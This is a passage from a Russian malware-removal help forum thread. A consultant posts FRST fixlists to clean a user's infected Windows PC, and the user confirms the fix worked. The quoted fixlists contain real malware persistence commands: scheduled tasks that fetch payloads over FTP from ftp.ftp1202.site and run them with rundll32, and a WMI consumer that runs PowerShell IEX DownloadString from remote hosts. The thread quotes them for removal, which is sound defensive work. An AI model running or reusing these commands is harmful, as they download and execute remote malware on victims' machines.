    Task: {10886A58-E130-49F1-89F3-85AA7CAA6CBD} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
    Task: {72F83CA1-2DA5-4AEE-B874-E36A46146CB2} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
    Task: {B0DA8B18-0966-441C-A91C-5E5431CEA4CA} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
    Task: {B3452BF4-16AA-429B-9648-A8476C911274} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{d898aa95-b9f9-4764-a724-f740df323b8b} <==== ATTENTION (Restriction - IP)
    2020-01-06 18:47 - 2020-01-06 18:47 - 000003170 _____ C:\Windows\system32\Tasks\oka
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003520 _____ C:\Windows\system32\Tasks\Mysa
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003506 _____ C:\Windows\system32\Tasks\Mysa3
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003426 _____ C:\Windows\system32\Tasks\Mysa2
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1
    2020-01-06 18:44 - 2020-01-06 18:47 - 000003186 _____ C:\Windows\system32\Tasks\ok
    WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATTENTION
    WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATTENTION
    WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
    
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
     
     
    Сделайте новые логи FRST.

     

    Прикрепленные файлы

    • Прикрепленный файл  Fixlog.txt   6,16К   скачиваний 0
    • Прикрепленный файл  Addition.txt   21,67К   скачиваний 1
    • Прикрепленный файл  FRST.txt   63,45К   скачиваний 1

    • 0

    #14 OFF   mike 1

    mike 1

      Мурзик

    • Консультанты
    • Старожилы
    • PipPipPipPipPipPipPipPipPipPipPipPipPip
    • Cообщений: 13 565

    Отправлено 06 Январь 2020 - 20:36

    ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
    • Временно выгрузите антивирус, файрволл и прочее защитное ПО
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION
    2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps
    2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s
    2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
     
     
    Пробуйте установить антивирус. 

    • 0

    #15 OFF   Larisa46

    Larisa46

      Новичок

    • Новички
    • Cообщений: 8

    Отправлено 07 Январь 2020 - 06:39

     

    ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
    • Временно выгрузите антивирус, файрволл и прочее защитное ПО
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
    CreateRestorePoint:
    CloseProcesses:
    Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION
    2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps
    2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s
    2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p
    ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
    
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
     
     
    Пробуйте установить антивирус. 

     

    Теперь все отлично, тормоза пропали. Антивирь встал нормально. Благодарю за помощь.+ в карму.


    • 0




    Количество пользователей, читающих эту тему: 0

    0 пользователей, 0 гостей, 0 анонимных